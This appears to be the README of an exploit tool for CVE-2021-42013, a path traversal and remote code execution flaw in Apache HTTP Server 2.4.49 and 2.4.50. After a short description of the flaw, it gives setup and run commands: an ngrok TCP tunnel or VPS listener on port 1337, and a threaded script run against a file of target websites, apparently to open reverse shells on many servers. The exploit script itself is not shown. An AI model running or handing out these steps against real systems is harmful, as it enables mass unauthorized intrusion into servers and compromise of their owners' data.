CVE-2021-42013 is a critical vulnerability in Apache HTTP Server 2.4.49 & 2.4.50 that allows remote code execution (RCE) via a path traversal attack.
🔍 What’s the Issue?
It exploits a misconfiguration in mod_proxy.
Attackers can access restricted files or execute arbitrary commands on the server.
It affects Apache 2.4.49 & 2.4.50 (but is fixed in 2.4.51).
This vulnerability exploits a path traversal attack vector, allowing attackers to manipulate URLs, mapping them to files outside the intended directories configured by Alias-like directives. When these files lack proper protection, such as the "require all denied" configuration, attackers can exploit this vulnerability by executing commands from the vulnerable path.
# Exploitation and Impact 💥
The severity of this vulnerability escalates if CGI scripts are enabled for the aliased paths. Exploiting CVE-2021-42013 grants attackers the ability to remotely execute arbitrary code on the targeted server, potentially leading to a complete system compromise as seen below.
1.You must have python3 and install command : python3 pip install rich alive-progress
2.Setup your local with ngrok tcp (premium member only because nothing good free they are expired test as my forms now lol) 1337 or need own vps to port forward 1337
3.Command run tools : python3 CVE-2021-42013.py --file target_website.txt --lhost ngrok_host --lport 1337 --threads 10